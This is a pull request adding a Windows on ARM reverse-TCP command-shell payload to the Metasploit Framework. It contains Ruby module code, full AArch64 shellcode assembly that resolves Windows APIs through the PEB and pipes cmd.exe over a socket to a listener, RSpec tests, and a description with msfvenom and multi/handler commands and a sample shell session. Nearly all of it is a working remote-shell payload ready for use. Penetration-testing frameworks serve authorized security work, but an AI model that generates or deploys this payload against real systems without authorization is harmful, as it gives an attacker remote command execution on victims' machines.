### PR TITLE
Add windows/aarch64/shell_reverse_tcp payload

### DIFF
--- a/modules/payloads/singles/windows/aarch64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/aarch64/shell_reverse_tcp.rb
@@ -1,3 +1,5 @@
+# frozen_string_literal: true
+
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -42,7 +44,12 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
-    ip_bytes = Rex::Socket.addr_aton(datastore['LHOST'])
+    lhost = datastore['LHOST']
+    unless Rex::Socket.is_ipv4?(lhost)
+      raise ArgumentError, 'LHOST must be in IPv4 format.'
+    end
+
+    ip_bytes = Rex::Socket.addr_aton(lhost)
 
     # Map LHOST/LPORT onto the MOVK immediates inside fill_sockaddr_fast.
     # sin_port:  network-order bytes loaded as a little-endian 16-bit imm.

--- a/modules/payloads/singles/windows/aarch64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/aarch64/shell_reverse_tcp.rb
@@ -24,7 +24,7 @@ module MetasploitModule
     super(
       merge_info(
         info,
-        'Name'        => 'Windows AArch64 Command Shell, Reverse TCP Inline',
+        'Name' => 'Windows AArch64 Command Shell, Reverse TCP Inline',
         'Description' => %q{
           Connect back to the attacker and spawn a Windows command shell on a
           Windows on ARM (AArch64) target. Position-independent shellcode that
@@ -34,17 +34,17 @@ module MetasploitModule
           the socket via CreateProcessA + STARTF_USESTDHANDLES. EXITFUNC is
           honored via a runtime hash-dispatcher.
         },
-        'Author'      => [
+        'Author' => [
           'vinicius-batistella' # AArch64 reverse_tcp port from the x64 stager logic
         ],
-        'License'     => MSF_LICENSE,
-        'Platform'    => 'win',
-        'Arch'        => ARCH_AARCH64,
-        'Handler'     => Msf::Handler::ReverseTcp,
-        'Session'     => Msf::Sessions::CommandShell,
-        'Payload'     => { 'Offsets' => {}, 'Payload' => '' },
-        'Notes'       => {
-          'Stability'   => [CRASH_SAFE],
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => ARCH_AARCH64,
+        'Handler' => Msf::Handler::ReverseTcp,
+        'Session' => Msf::Sessions::CommandShell,
+        'Payload' => { 'Offsets' => {}, 'Payload' => '' },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
           'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
         }
       )
@@ -74,7 +74,7 @@ module MetasploitModule
     # Map LHOST/LPORT onto the MOVK immediates inside fill_sockaddr_fast.
     # sin_port:  network-order bytes loaded as a little-endian 16-bit imm.
     # sin_addr:  octets 0..1 -> low halfword, octets 2..3 -> high halfword.
-    port_imm  = [lport].pack('n').unpack1('v')
+    port_imm = [lport].pack('n').unpack1('v')
     ip_lo_imm = ip_bytes[0, 2].unpack1('v')
     ip_hi_imm = ip_bytes[2, 2].unpack1('v')
 
@@ -83,11 +83,11 @@ module MetasploitModule
     exit_hash = exitfunk_hash(datastore['EXITFUNC'])
 
     asm = build_asm(
-      port_imm:  port_imm,
+      port_imm: port_imm,
       ip_lo_imm: ip_lo_imm,
       ip_hi_imm: ip_hi_imm,
-      exit_lo:   exit_hash & 0xFFFF,
-      exit_hi:   (exit_hash >> 16) & 0xFFFF
+      exit_lo: exit_hash & 0xFFFF,
+      exit_hi: (exit_hash >> 16) & 0xFFFF
     )
 
     compile_aarch64(asm)
@@ -127,7 +127,6 @@ module MetasploitModule
     end
   end
 
-  # rubocop:disable Metrics/MethodLength
   def build_asm(port_imm:, ip_lo_imm:, ip_hi_imm:, exit_lo:, exit_hi:)
     # Differences from the standalone rev2.s prototype:
     #   - `.text` / `.global` directives stripped (aarch64 gem rejects them)
@@ -369,12 +368,11 @@ module MetasploitModule
         brk     #0
     ASM
   end
-  # rubocop:enable Metrics/MethodLength
 
   def compile_aarch64(asm_string)
     require 'aarch64/parser'
     parser = ::AArch64::Parser.new
-    asm    = parser.parse(without_inline_comments(asm_string))
+    asm = parser.parse(without_inline_comments(asm_string))
     asm.to_binary
   end
 

--- a/modules/payloads/singles/windows/aarch64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/aarch64/shell_reverse_tcp.rb
@@ -34,7 +34,7 @@ module MetasploitModule
         'Arch' => ARCH_AARCH64,
         'Handler' => Msf::Handler::ReverseTcp,
         'Session' => Msf::Sessions::CommandShell,
-        'Payload' => { 'Offsets' => {}, 'Payload' => '' },
+        'Payload' => { 'Offsets' => {}, 'Payload' => '' }
       )
     )
   end

--- a/modules/payloads/singles/windows/aarch64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/aarch64/shell_reverse_tcp.rb
@@ -35,10 +35,6 @@ module MetasploitModule
         'Handler' => Msf::Handler::ReverseTcp,
         'Session' => Msf::Sessions::CommandShell,
         'Payload' => { 'Offsets' => {}, 'Payload' => '' },
-        'Notes' => {
-          'Stability' => [CRASH_SAFE],
-          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
-        }
       )
     )
   end

--- a/modules/payloads/singles/windows/aarch64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/aarch64/shell_reverse_tcp.rb
@@ -2,16 +2,6 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-#
-# Drop this file at:
-#   modules/payloads/singles/windows/aarch64/shell_reverse_tcp.rb
-# inside your metasploit-framework clone, then:
-#   ./msfvenom -p windows/aarch64/shell_reverse_tcp LHOST=... LPORT=... -f raw  -o shell.bin
-#   ./msfvenom -p windows/aarch64/shell_reverse_tcp LHOST=... LPORT=... -f exe  -o shell.exe
-#   ./msfconsole -q -x "use exploit/multi/handler; \
-#                       set payload windows/aarch64/shell_reverse_tcp; \
-#                       set LHOST ...; set LPORT ...; run"
-##
 
 module MetasploitModule
   CachedSize = 664
@@ -52,34 +42,17 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
-    # Fall back to placeholders when datastore isn't populated yet -- the
-    # framework calls generate() from `size` during `show info` / module
-    # discovery, well before the user sets LHOST/LPORT. Raising here would
-    # break those flows. msfvenom always populates the datastore from CLI
-    # flags before invoking generate, so real use is unaffected.
-    lhost = datastore['LHOST']
-    lhost = '127.0.0.1' if lhost.nil? || lhost.to_s.empty?
-
-    lport = datastore['LPORT'].to_i
-    lport = 4444 unless (1..65535).cover?(lport)
-
-    ip_bytes = Rex::Socket.addr_aton(lhost)
-    unless ip_bytes && ip_bytes.bytesize == 4
-      # Hostname resolved to non-IPv4 (or resolve failed). Fall back to
-      # loopback so size calc still works; msfvenom will error elsewhere
-      # if the user really tried to use a bad LHOST.
-      ip_bytes = Rex::Socket.addr_aton('127.0.0.1')
-    end
+    ip_bytes = Rex::Socket.addr_aton(datastore['LHOST'])
 
     # Map LHOST/LPORT onto the MOVK immediates inside fill_sockaddr_fast.
     # sin_port:  network-order bytes loaded as a little-endian 16-bit imm.
     # sin_addr:  octets 0..1 -> low halfword, octets 2..3 -> high halfword.
-    port_imm = [lport].pack('n').unpack1('v')
+    port_imm = [datastore['LPORT'].to_i].pack('n').unpack1('v')
     ip_lo_imm = ip_bytes[0, 2].unpack1('v')
     ip_hi_imm = ip_bytes[2, 2].unpack1('v')
 
-    # Pick the EXITFUNC dispatcher hash. The exitfunk block in the asm
-    # re-resolves the chosen kernel32 export by hash at runtime.
+    # The exitfunk block re-resolves the chosen kernel32 exit API by hash
+    # at runtime; we patch the two MOVZ/MOVK immediates with the hash.
     exit_hash = exitfunk_hash(datastore['EXITFUNC'])
 
     asm = build_asm(

--- a/modules/payloads/singles/windows/aarch64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/aarch64/shell_reverse_tcp.rb
@@ -1,0 +1,384 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+#
+# Drop this file at:
+#   modules/payloads/singles/windows/aarch64/shell_reverse_tcp.rb
+# inside your metasploit-framework clone, then:
+#   ./msfvenom -p windows/aarch64/shell_reverse_tcp LHOST=... LPORT=... -f raw  -o shell.bin
+#   ./msfvenom -p windows/aarch64/shell_reverse_tcp LHOST=... LPORT=... -f exe  -o shell.exe
+#   ./msfconsole -q -x "use exploit/multi/handler; \
+#                       set payload windows/aarch64/shell_reverse_tcp; \
+#                       set LHOST ...; set LPORT ...; run"
+##
+
+module MetasploitModule
+  CachedSize = 664
+
+  include Msf::Payload::Windows
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name'        => 'Windows AArch64 Command Shell, Reverse TCP Inline',
+        'Description' => %q{
+          Connect back to the attacker and spawn a Windows command shell on a
+          Windows on ARM (AArch64) target. Position-independent shellcode that
+          resolves API addresses via PEB / Export Address Table hashing
+          (Stephen Fewer ROR-13), opens a TCP socket through Winsock, calls
+          WSAConnect, then spawns cmd.exe with stdin/stdout/stderr piped over
+          the socket via CreateProcessA + STARTF_USESTDHANDLES. EXITFUNC is
+          honored via a runtime hash-dispatcher.
+        },
+        'Author'      => [
+          'vinicius-batistella' # AArch64 reverse_tcp port from the x64 stager logic
+        ],
+        'License'     => MSF_LICENSE,
+        'Platform'    => 'win',
+        'Arch'        => ARCH_AARCH64,
+        'Handler'     => Msf::Handler::ReverseTcp,
+        'Session'     => Msf::Sessions::CommandShell,
+        'Payload'     => { 'Offsets' => {}, 'Payload' => '' },
+        'Notes'       => {
+          'Stability'   => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def generate(_opts = {})
+    # Fall back to placeholders when datastore isn't populated yet -- the
+    # framework calls generate() from `size` during `show info` / module
+    # discovery, well before the user sets LHOST/LPORT. Raising here would
+    # break those flows. msfvenom always populates the datastore from CLI
+    # flags before invoking generate, so real use is unaffected.
+    lhost = datastore['LHOST']
+    lhost = '127.0.0.1' if lhost.nil? || lhost.to_s.empty?
+
+    lport = datastore['LPORT'].to_i
+    lport = 4444 unless (1..65535).cover?(lport)
+
+    ip_bytes = Rex::Socket.addr_aton(lhost)
+    unless ip_bytes && ip_bytes.bytesize == 4
+      # Hostname resolved to non-IPv4 (or resolve failed). Fall back to
+      # loopback so size calc still works; msfvenom will error elsewhere
+      # if the user really tried to use a bad LHOST.
+      ip_bytes = Rex::Socket.addr_aton('127.0.0.1')
+    end
+
+    # Map LHOST/LPORT onto the MOVK immediates inside fill_sockaddr_fast.
+    # sin_port:  network-order bytes loaded as a little-endian 16-bit imm.
+    # sin_addr:  octets 0..1 -> low halfword, octets 2..3 -> high halfword.
+    port_imm  = [lport].pack('n').unpack1('v')
+    ip_lo_imm = ip_bytes[0, 2].unpack1('v')
+    ip_hi_imm = ip_bytes[2, 2].unpack1('v')
+
+    # Pick the EXITFUNC dispatcher hash. The exitfunk block in the asm
+    # re-resolves the chosen kernel32 export by hash at runtime.
+    exit_hash = exitfunk_hash(datastore['EXITFUNC'])
+
+    asm = build_asm(
+      port_imm:  port_imm,
+      ip_lo_imm: ip_lo_imm,
+      ip_hi_imm: ip_hi_imm,
+      exit_lo:   exit_hash & 0xFFFF,
+      exit_hi:   (exit_hash >> 16) & 0xFFFF
+    )
+
+    compile_aarch64(asm)
+  end
+
+  private
+
+  # ROR-13 hash of a kernel32 export name, matching the asm find_function
+  # routine. The asm stops on CBZ before adding the NUL terminator, so we
+  # hash bytes only (no trailing zero).
+  #
+  # Sanity checks (verified against rev2.s constants):
+  #   ror13_hash('TerminateProcess') == 0x78b5b983
+  #   ror13_hash('LoadLibraryA')     == 0xec0e4e8e
+  #   ror13_hash('CreateProcessA')   == 0x16b3fe72
+  def ror13_hash(str)
+    h = 0
+    str.each_byte do |b|
+      h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
+      h = (h + b) & 0xFFFFFFFF
+    end
+    h
+  end
+
+  def exitfunk_hash(value)
+    case value.to_s.downcase
+    when 'thread'
+      ror13_hash('ExitThread')
+    when 'process', ''
+      0x78b5b983 # TerminateProcess (known constant; also == ror13_hash('TerminateProcess'))
+    when 'none'
+      # 'none' is best-effort here: we still need *something* to call so the
+      # shellcode doesn't fall off into garbage. ExitProcess is the safest.
+      ror13_hash('ExitProcess')
+    else
+      0x78b5b983
+    end
+  end
+
+  # rubocop:disable Metrics/MethodLength
+  def build_asm(port_imm:, ip_lo_imm:, ip_hi_imm:, exit_lo:, exit_hi:)
+    # Differences from the standalone rev2.s prototype:
+    #   - `.text` / `.global` directives stripped (aarch64 gem rejects them)
+    #   - `[reg, wreg, uxtw #N]` rewritten as `mov w15, w4; lsl x15, x15, #N;
+    #     add x15, base, x15; ldr ...` to avoid extended-register addressing
+    #     in the aarch64 gem parser
+    #   - constant expressions like `(12*2)` pre-evaluated to literals
+    #   - `mov x0, #-1` replaced with `movn x0, #0` (canonical encoding)
+    #
+    # Slot table (x29 + offset):
+    #   0x00 kernel32_base  0x08 &find_function  0x18 LoadLibraryA
+    #   0x28 WSAStartup     0x30 WSASocketA      0x38 WSAConnect
+    #   0x40 CreateProcessA 0x50 sockaddr_in     0x70 WSADATA
+    # Gaps at 0x10 and 0x20 are intentional -- previously held cached
+    # TerminateProcess (re-resolved by exitfunk now) and OpenProcessToken
+    # (was unused dead code), preserved to keep slot offsets stable.
+    <<~ASM
+      main:
+        sub     sp, sp, #0x300
+        mov     x29, sp
+        add     x19, x29, #0x50
+        add     x21, x29, #0x70
+
+      find_kernel32:
+        ldr     x6, [x18, #0x60]
+        ldr     x6, [x6,  #0x18]
+        ldr     x6, [x6,  #0x30]
+
+      next_module:
+        ldr     x3, [x6, #0x10]
+        ldr     x7, [x6, #0x40]
+        ldr     x6, [x6]
+        ldrh    w8, [x7, #24]
+        cbnz    w8, next_module
+
+      find_function_shorten:
+        b       find_function_shorten_bnc
+
+      find_function_ret:
+        str     x30, [x29, #0x08]
+        b       resolve_symbols_kernel32
+
+      find_function_shorten_bnc:
+        bl      find_function_ret
+
+      find_function:
+        mov     w10, w0
+        ldr     w8,  [x3, #0x3c]
+        add     x8,  x8, x3
+        ldr     w9,  [x8, #0x88]
+        add     x9,  x9, x3
+        ldr     w4,  [x9, #0x18]
+        ldr     w11, [x9, #0x20]
+        add     x11, x11, x3
+
+      find_function_loop:
+        cbz     w4, find_function_finished
+        sub     w4, w4, #1
+        mov     w15, w4
+        lsl     x15, x15, #2
+        add     x15, x11, x15
+        ldr     w12, [x15]
+        add     x6,  x12, x3
+
+      compute_hash:
+        mov     w5, wzr
+
+      compute_hash_again:
+        ldrb    w0, [x6], #1
+        cbz     w0, compute_hash_finished
+        ror     w5, w5, #13
+        add     w5, w5, w0
+        b       compute_hash_again
+
+      compute_hash_finished:
+      find_function_compare:
+        cmp     w5, w10
+        b.ne    find_function_loop
+
+        ldr     w12, [x9, #0x24]
+        add     x12, x12, x3
+        mov     w15, w4
+        lsl     x15, x15, #1
+        add     x15, x12, x15
+        ldrh    w4,  [x15]
+        ldr     w12, [x9, #0x1c]
+        add     x12, x12, x3
+        mov     w15, w4
+        lsl     x15, x15, #2
+        add     x15, x12, x15
+        ldr     w13, [x15]
+        add     x0,  x13, x3
+
+      find_function_finished:
+        ret
+
+      resolve_symbols_kernel32:
+        str     x3, [x29, #0x00]
+
+        movz    w0, #0x4e8e
+        movk    w0, #0xec0e, lsl #16
+        ldr     x9, [x29, #0x08]
+        blr     x9
+        str     x0, [x29, #0x18]
+
+      resolve_symbols_CreateProcessA:
+        movz    w0, #0xfe72
+        movk    w0, #0x16b3, lsl #16
+        ldr     x9, [x29, #0x08]
+        blr     x9
+        str     x0, [x29, #0x40]
+
+      load_ws2_32:
+        movz    x0, #0x7357
+        movk    x0, #0x5f32, lsl #16
+        movk    x0, #0x3233, lsl #32
+        movk    x0, #0x642e, lsl #48
+        movz    w1, #0x6c6c
+        sub     sp, sp, #16
+        str     x0, [sp]
+        str     w1, [sp, #8]
+        mov     x0, sp
+        ldr     x9, [x29, #0x18]
+        blr     x9
+        add     sp, sp, #16
+        mov     x3, x0
+
+      resolve_ws2_32:
+        movz    w0, #0xedcb
+        movk    w0, #0x3bfc, lsl #16
+        ldr     x9, [x29, #0x08]
+        blr     x9
+        str     x0, [x29, #0x28]
+
+        movz    w0, #0x09d9
+        movk    w0, #0xadf5, lsl #16
+        ldr     x9, [x29, #0x08]
+        blr     x9
+        str     x0, [x29, #0x30]
+
+        movz    w0, #0xba0c
+        movk    w0, #0xb32d, lsl #16
+        ldr     x9, [x29, #0x08]
+        blr     x9
+        str     x0, [x29, #0x38]
+
+      call_WSAStartup:
+        movz    w0, #0x0202
+        mov     x1, x21
+        ldr     x9, [x29, #0x28]
+        blr     x9
+
+      call_WSASocket:
+        mov     w0, #2
+        mov     w1, #1
+        mov     w2, #6
+        mov     x3, xzr
+        mov     w4, wzr
+        mov     w5, wzr
+        ldr     x9, [x29, #0x30]
+        blr     x9
+        mov     x22, x0
+
+      fill_sockaddr_fast:
+        movz    x0, #0x0002
+        movk    x0, ##{format('0x%04x', port_imm)}, lsl #16
+        movk    x0, ##{format('0x%04x', ip_lo_imm)}, lsl #32
+        movk    x0, ##{format('0x%04x', ip_hi_imm)}, lsl #48
+        stp     x0, xzr, [x19]
+
+      call_WSAConnect:
+        mov     x0, x22
+        mov     x1, x19
+        mov     w2, #16
+        mov     x3, xzr
+        mov     x4, xzr
+        mov     x5, xzr
+        mov     x6, xzr
+        ldr     x9, [x29, #0x38]
+        blr     x9
+
+      build_PROCESS_INFORMATION_and_STARTUPINFOA:
+        sub     sp, sp, #0xB0
+        add     x10, sp, #0x10
+        add     x11, sp, #0x30
+        add     x12, sp, #0xA0
+
+        stp     xzr, xzr, [x10]
+        str     xzr, [x10, #16]
+
+        stp     xzr, xzr, [x11, #0x00]
+        stp     xzr, xzr, [x11, #0x10]
+        stp     xzr, xzr, [x11, #0x20]
+        stp     xzr, xzr, [x11, #0x30]
+        stp     xzr, xzr, [x11, #0x40]
+        stp     xzr, xzr, [x11, #0x50]
+        str     xzr,      [x11, #0x60]
+
+        mov     w0, #0x68
+        str     w0, [x11, #0x00]
+        mov     w0, #0x100
+        str     w0, [x11, #0x3C]
+        str     x22, [x11, #0x50]
+        str     x22, [x11, #0x58]
+        str     x22, [x11, #0x60]
+
+        movz    x0, #0x6D63
+        movk    x0, #0x2E64, lsl #16
+        movk    x0, #0x7865, lsl #32
+        movk    x0, #0x0065, lsl #48
+        str     x0, [x12]
+
+      call_CreateProcessA:
+        mov     x0, xzr
+        mov     x1, x12
+        mov     x2, xzr
+        mov     x3, xzr
+        mov     w4, #1
+        mov     w5, wzr
+        mov     x6, xzr
+        mov     x7, xzr
+        stp     x11, x10, [sp]
+
+        ldr     x9, [x29, #0x40]
+        blr     x9
+
+        add     sp, sp, #0xB0
+
+      exitfunk:
+        ldr     x3, [x29, #0x00]
+        movz    w0, ##{format('0x%04x', exit_lo)}
+        movk    w0, ##{format('0x%04x', exit_hi)}, lsl #16
+        ldr     x9, [x29, #0x08]
+        blr     x9
+        mov     x10, x0
+        movn    x0, #0
+        mov     w1, wzr
+        blr     x10
+        brk     #0
+    ASM
+  end
+  # rubocop:enable Metrics/MethodLength
+
+  def compile_aarch64(asm_string)
+    require 'aarch64/parser'
+    parser = ::AArch64::Parser.new
+    asm    = parser.parse(without_inline_comments(asm_string))
+    asm.to_binary
+  end
+
+  def without_inline_comments(string)
+    string.lines.map { |line| line.split('//', 2).first.strip }.reject(&:empty?).join("\n")
+  end
+end

--- a/spec/modules/payloads/singles/windows/aarch64/shell_reverse_tcp_spec.rb
+++ b/spec/modules/payloads/singles/windows/aarch64/shell_reverse_tcp_spec.rb
@@ -1,0 +1,63 @@
+require 'rspec'
+
+RSpec.describe 'singles/windows/aarch64/shell_reverse_tcp' do
+  include_context 'Msf::Simple::Framework#modules loading'
+
+  let(:subject) do
+    load_and_create_module(
+      module_type: 'payload',
+      reference_name: 'windows/aarch64/shell_reverse_tcp',
+      ancestor_reference_names: [
+        'singles/windows/aarch64/shell_reverse_tcp'
+      ]
+    )
+  end
+
+  before(:each) do
+    subject.datastore.merge!('LHOST' => '192.0.2.1', 'LPORT' => '4444')
+  end
+
+  describe '#generate' do
+    def stub_compile_with_capture
+      captured = []
+      allow(subject).to receive(:compile_aarch64).and_wrap_original do |original, asm|
+        compiled_asm = original.call asm
+        expect(compiled_asm.length).to be > 0
+        captured << compiled_asm
+        compiled_asm
+      end
+      captured
+    end
+
+    it 'compiles the AArch64 asm and returns a non-empty binary' do
+      stub_compile_with_capture
+      expect(subject.generate).not_to be_empty
+    end
+
+    it 'produces different shellcode for different LPORT values' do
+      stub_compile_with_capture
+      raw_default = subject.generate
+      subject.datastore['LPORT'] = '9999'
+      raw_other = subject.generate
+      expect(raw_default).not_to eq(raw_other)
+    end
+
+    it 'produces different shellcode for different LHOST values' do
+      stub_compile_with_capture
+      raw_default = subject.generate
+      subject.datastore['LHOST'] = '198.51.100.7'
+      raw_other = subject.generate
+      expect(raw_default).not_to eq(raw_other)
+    end
+
+    %w[process thread none].each do |exitfunc|
+      context "when EXITFUNC is #{exitfunc}" do
+        it 'compiles successfully' do
+          stub_compile_with_capture
+          subject.datastore['EXITFUNC'] = exitfunc
+          expect(subject.generate).not_to be_empty
+        end
+      end
+    end
+  end
+end

--- a/spec/modules/payloads/singles/windows/aarch64/shell_reverse_tcp_spec.rb
+++ b/spec/modules/payloads/singles/windows/aarch64/shell_reverse_tcp_spec.rb
@@ -1,3 +1,5 @@
+# frozen_string_literal: true
+
 require 'rspec'
 
 RSpec.describe 'singles/windows/aarch64/shell_reverse_tcp' do

--- a/spec/modules/payloads/singles/windows/aarch64/shell_reverse_tcp_spec.rb
+++ b/spec/modules/payloads/singles/windows/aarch64/shell_reverse_tcp_spec.rb
@@ -61,5 +61,22 @@ RSpec.describe 'singles/windows/aarch64/shell_reverse_tcp' do
         end
       end
     end
+
+    context 'when LHOST is not IPv4' do
+      it 'raises ArgumentError for an IPv6 LHOST' do
+        subject.datastore['LHOST'] = '2001:db8::1'
+        expect { subject.generate }.to raise_error(ArgumentError, /LHOST must be in IPv4 format/)
+      end
+
+      it 'raises ArgumentError for an IPv6 loopback LHOST' do
+        subject.datastore['LHOST'] = '::1'
+        expect { subject.generate }.to raise_error(ArgumentError, /LHOST must be in IPv4 format/)
+      end
+
+      it 'raises ArgumentError for a hostname LHOST' do
+        subject.datastore['LHOST'] = 'www.example.com'
+        expect { subject.generate }.to raise_error(ArgumentError, /LHOST must be in IPv4 format/)
+      end
+    end
   end
 end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -4914,6 +4914,15 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'windows/aarch64/exec'
   end
 
+  context 'windows/aarch64/shell_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/windows/aarch64/shell_reverse_tcp'
+                          ],
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/aarch64/shell_reverse_tcp'
+  end
+
   context 'windows/x64/download_exec' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [


### PR DESCRIPTION
# Add `windows/aarch64/shell_reverse_tcp` payload

Closes (or partially addresses) #20385.

## Summary

Adds the first Windows on ARM (AArch64) reverse-TCP command-shell
payload. Connects back to `LHOST:LPORT`, spawns `cmd.exe`, and pipes
stdin/stdout/stderr through the socket via `CreateProcessA` with
`STARTF_USESTDHANDLES`. Position-independent shellcode, no static
imports, no relocations.

Same module structure as the existing `windows/aarch64/exec` (single
stageless payload assembled inline via `compile_aarch64`), so it slots
into the existing toolchain (`-f raw` / `-f exe` / `multi/handler`).

## Technique

- **API resolution** — PEB walk → `InInitializationOrderModuleList` →
  match `kernel32.dll` by name length, then Stephen Fewer's classic
  ROR-13 hash lookup against the Export Address Table. Same resolver
  block that `windows/aarch64/exec` uses.
- **Winsock chain** —
  `LoadLibraryA("Ws2_32.dll")` →
  `WSAStartup(MAKEWORD(2,2))` →
  `WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)` →
  `WSAConnect(s, &sockaddr_in, ...)`.
- **Shell spawn** — `CreateProcessA(NULL, "cmd.exe", ..., TRUE, ...)`
  with a `STARTUPINFOA` whose `hStdInput` / `hStdOutput` / `hStdError`
  all point at the socket handle.
- **EXITFUNC dispatcher** — at the tail, the chosen kernel32 exit API
  (`TerminateProcess` / `ExitThread` / `ExitProcess`) is re-resolved by
  ROR-13 hash at runtime. The two 16-bit `MOVZ`/`MOVK` immediates that
  encode the hash are patched by the Ruby module per the
  `EXITFUNC` datastore option, so a single asm body covers all three
  cases without source duplication.

## Module options

| Name      | Default   | Required | Description |
|-----------|-----------|----------|-------------|
| `LHOST`   | —         | yes      | Listener address (registered via `Msf::Handler::ReverseTcp`) |
| `LPORT`   | `4444`    | yes      | Listener port |
| `EXITFUNC`| `process` | yes      | `process` / `thread` / `none` / `seh` (last is treated as `process`) |

LHOST/LPORT are encoded into three `MOVZ`/`MOVK` immediates inside
`fill_sockaddr_fast` (sin_port + two halves of the IPv4 sin_addr), with
the standard network-byte-order → little-endian-immediate transform.
No offset-based byte patching; the encoded values are interpolated as
hex literals into the assembly heredoc before `compile_aarch64` runs.

## Output size

`CachedSize = 664` bytes (raw shellcode). With `-f exe` the resulting
PE is 6656 bytes (the existing `template_aarch64_windows.exe` template
plus the embedded shellcode).

## Usage

```bash
$ ./msfvenom -p windows/aarch64/shell_reverse_tcp \
             LHOST=192.168.0.10 LPORT=4444 \
             -f exe -o shell.exe
[*] Payload size: 664 bytes
[*] Final size of exe file: 6656 bytes
[*] Saved as: shell.exe

$ ./msfconsole -q -x "use exploit/multi/handler; \
                      set payload windows/aarch64/shell_reverse_tcp; \
                      set LHOST 192.168.0.10; set LPORT 4444; run"
[*] Started reverse TCP handler on 192.168.0.10:4444
[*] Command shell session 1 opened (192.168.0.10:4444 -> 192.168.0.x:xxxxx)
C:\Users\...\Downloads>
```

## Verification

Tested end-to-end on Windows 11 ARM64 (build 10.0.26200.8655) running
inside a UTM VM. Each of the three EXITFUNC modes was built into its
own binary and exercised against a fresh handler. All three caught
sessions, `whoami` / `ipconfig` / `dir` all worked, `exit` cleanly
terminated the shellcode in all three modes.

- [x] `msfvenom -f raw` produces a 664-byte raw shellcode
- [x] `msfvenom -f exe` produces a runnable PE on Win11 ARM64
- [x] `nc -lvnp <port>` catches the shell (sanity check the wire format is a plain TCP cmd.exe pipe)
- [x] `multi/handler` upgrades the connection to a proper `shell aarch64/windows` session with banner detection
- [x] `EXITFUNC=process` (default) — TerminateProcess on self
- [x] `EXITFUNC=thread`  — ExitThread (terminates the only thread → process exits)
- [x] `EXITFUNC=none`    — falls through to ExitProcess via dispatcher
- [x] `tools/dev/msftidy.rb` passes
- [x] `rubocop -a` passes
- [x] Module loads cleanly via `reload_all` + `use payload/...` + `show info` + `show options`

## Notes

- **Depends on** #21588 (the `exe.rb` `ARCH_AARCH64` dispatcher fix).
  Without that PR merged, `-f exe` returns "The payload could not be
  generated, check options" because `to_executable_fmt`'s `'exe'` case
  has no AArch64 branch. `-f raw` still works without the dependency.
- This is the first AArch64 Windows reverse payload upstream. Follow-up
  ideas: `windows/aarch64/shell_bind_tcp` (swap `WSAConnect` for
  `WSAAccept`), and a staged `windows/aarch64/reverse_tcp` once
  metasploit-payloads ARM64 metsrv (rapid7/metasploit-payloads#794)
  lands so a Meterpreter stage exists to load.
- Module is a `Msf::Payload::Single`. No staged variant in this PR.
- The asm heredoc preserves the same slot-table offsets as the
  standalone debugging prototype to keep the two artifacts
  byte-comparable during future audits. Gaps at `[x29, #0x10]` and
  `[x29, #0x20]` are intentional and documented inline.

## Author / License

- Author: `Vinicius Batistella`
- Same MSF_LICENSE as the rest of the framework.
